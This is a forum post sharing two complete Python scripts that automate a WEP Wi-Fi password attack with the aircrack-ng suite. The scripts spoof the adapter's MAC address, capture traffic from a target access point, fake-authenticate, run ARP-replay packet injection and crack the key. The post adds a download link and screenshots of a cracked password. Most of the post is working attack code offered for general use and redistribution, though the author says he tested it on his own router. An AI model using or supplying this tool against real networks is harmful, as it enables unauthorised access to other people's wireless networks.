• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Automated WEP cracking script (Client)
#1
Well, my Alfa adapter has finally arrived so it's time to start cracking some networks. (In my test environment)

[spoiler=Picture of the Alfa AWUS036H]

[Image: alfa-2.jpg]
[/spoiler]


I'm still learning python and i made these scripts 100% by myself from scratch so i'm sure they can be optimised and cleaned up a bit but they work and i've tested them. At the moment they only cover the standard WEP crack which means you need a client connected to the WEP network.

I will be making other scripts, for WPA and alternative WEP and i'll post them here.

The script is split in to two files, to run them simply cd in to the directory they're in and type:

Code:
sudo python wep.py

And then once you're prompted to use the second file it's:

Code:
sudo python wep2.py

in a new terminal

The script is very easy to use, all you have to do is follow the steps and enter 4 things.


The files can be found here:

Source code:

[spoiler=First file (wep.py)]

[code=python]
#!/usr/bin/python
import os

print "\n |---------------------------------------------------------------| \n | \n | " " Mark's WEP cracking script. " " (wep.py) \n | \n | "" For questions or support please visit http://mcompute.co.uk \n | \n | " " This script utilises the aircrack-ng suite and macchanger \n | \n | " " sudo apt-get install aircrack-ng and sudo apt-get install macchanger \n | \n | " " Note: Please make sure you have a compatible WiFi card \n | \n |---------------------------------------------------------------|"
raw_input("\n Press enter to continue..")

#Stores the file location of wep2.py to write to it later.
print "\n Enter the full file location of the file 'wep2.py' (eg. /home/mark/Desktop/python/wep/wep2.py )"
file_location = raw_input(' '"File location: ")

print "\n\n Please determine your wirelesss interface from the list below."

#Prints all the available wireless interfaces.
airmon = "airmon-ng"
os.system(airmon)

#Stores the wireless interface in a string.
interface = raw_input("\n Enter your wireless interface: ")

#Stops the wireless interface
airmon_stop = "airmon-ng stop " + interface
os.system(airmon_stop)

#Starts the wireless interface
airmon_start = "airmon-ng start " + interface
os.system(airmon_start)

#Gets the interface, that's in monitor mode.
new_interface = raw_input("" " Enter the interface you want to scan on: ")

#Stores the MAC address they want to spoof to.
print "\n Example: 00:11:22:33:44:55"
spoof_mac = raw_input("" " Enter the MAC address you want to spoof to: ")

#Put's the interface (In monitor mode) down.
new_down = "ifconfig " + new_interface + " down"

#Spoofs the MAC address of the interface (The one in monitor mode)
spoof2 = "macchanger --mac " + spoof_mac + " " + new_interface

#Put's the interface (In monitor mode) up.
new_up = "ifconfig " + new_interface + " up"

#Runs the 3 above configs, basically changes the MAC address of the interface in monitor mode.
os.system(new_down)
os.system(spoof2)
os.system(new_up)

print "\n It will now start to scan for available wireless networks, to continue from the scanning page you will need to press ctrl + c once you have gathered the required information."
raw_input("" " Press enter to start scanning..")

#Starts scanning for wireless networks
airodump_scan = "airodump-ng " + new_interface
os.system(airodump_scan)

#Stores the channel, the designated capture file and the BSSID of the access point.
print "Please enter the following information about the wireless network that you wish to crack. (WEP encryption only!)"
channel_number = raw_input("Channel number: ")
cap_file_name = raw_input("Desired capture file name: ")
bssid_ap = raw_input("BSSID of the Access point: ")
ssid = raw_input("SSID of the Access point: ")

print "\n After you've pressed enter, please leave this terminal open and run the file ' wep2.py ' in a new terminal."
raw_input("\n Press enter to continue..")

#Opens and reads the file wep2.py
file = open(file_location, 'r')
info=file.readlines()
info[3]= "bssid_ap = " + "'" + bssid_ap + "'" + "\n"
info[4]= "spoof_mac = " + "'" + spoof_mac + "'" + "\n"
info[5]= "interface = " + "'" + interface + "'" + "\n"
info[6]= "cap_file_name = " + "'" + cap_file_name + "'" + "\n"
info[7]= "new_interface = " + "'" + new_interface + "'" + "\n"
info[8]= "ssid = " + "'" + ssid + "'" + "\n"

#Opens and writes to the file wep2.py
file = open(file_location, 'w')
file.writelines(info)
#Closes the file
file.close()

#Uses the information above and starts capturing packets.
airodump = "airodump-ng -c " + channel_number + " -w " + cap_file_name + " --bssid " + bssid_ap + " " + new_interface
os.system(airodump)
[/code]
[/spoiler]


[spoiler=Second file (wep2.py)]

[code=python]
#!/usr/bin/python
import os

bssid_ap = '00:E0:98:51:1A:C4'
spoof_mac = '00:11:22:33:44:66'
interface = 'wlan2'
cap_file_name = 'mcompute_wep_hack'
new_interface = 'mon0'
ssid = 'mcompute.co.uk'

aireplay_ng = "aireplay-ng -1 0 -a " + bssid_ap + " -h " + spoof_mac + " " + new_interface
arp_replay = "aireplay-ng -3 -b " + bssid_ap + " -h " + spoof_mac + " " + new_interface
fake_auth_advanced = "aireplay-ng -1 6000 -o 1 -q 10 -e" + " " + ssid + " -a " + bssid_ap + " -h " + spoof_mac + " " + new_interface

retry_yes = "r"
retry_no = "c"

injection_desc = ("\n \n It will now attempt to inject packets. \n \n Once you've collected enough IVs / Data (50k +), press ctrl + c to attempt to crack the password. \n Check the first terminal to see how many you've collected. \n")
auth_problem = ("\n \n Note: If you're having problems authenticating, you can try and manually authenticate by entering the following in to a new terminal before you continue: \n \n Simple: \n" + " " + aireplay_ng + " \n \n Advanced: \n" + " " + fake_auth_advanced)

print "\n |---------------------------------------------------------------| \n | \n | " " Mark's WEP cracking script. " " (wep2.py) \n | \n | " " For questions or support please visit http://mcompute.co.uk \n | \n | " " Note: Please run the file ' wep.py ' first \n | \n |---------------------------------------------------------------|"
raw_input("\n Press enter to continue.. \n")

print "\n It will now attempt to authenticate with the wireless access point."
raw_input("\n Press enter to start the authentication.. \n")

#Fake authenticates to the wireless access point.
os.system(aireplay_ng)

print "\n \n If the attack was unsuccessful, press 'r' to retry."
print "" " If the attack was successful, press ' c ' to continue."
print " " + auth_problem

def fake_auth():
os.system(aireplay_ng)

while 1:
retry = raw_input("\n Press ' r ' to retry or ' c ' to continue.. ")
if retry == retry_yes:
fake_auth()
if retry == retry_no:
break

print injection_desc

raw_input(" Press enter to continue..")

#arp replay packet injection
os.system(arp_replay)

print "\n \n Thank you for using Mark's WEP cracking script. If you have any questions, problems or feedback please go to http://mcompute.co.uk"
raw_input("\n Press enter to crack the password..")

#Cracks the password
aircrack_ng = "aircrack-ng -b " + bssid_ap + " " + cap_file_name + "-01.cap"
os.system(aircrack_ng)
[/code]
[/spoiler]


Download

Zip file containing both files.
http://markwood.co.cc/donotdelete/wep_with_client.zip


I set up my second router for this on my LAN with a 128 bit WEP password, and then cracked it.


The script in action

The introduction screen

[Image: WEP-1.png]


Scanning for networks

[Image: WEP-2.png]


Collecting data

[Image: WEP-3.png]


The cracked password

[Image: WEP-4.png]


You are free to use and redistribute these files but please keep the intro of the files intact.

If you have any question please post or PM me.
  Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Automated WEP cracking script (Clientless) Mark 0 8,859 05-07-2010, 10:01 PM
Last Post: Mark

Forum Jump: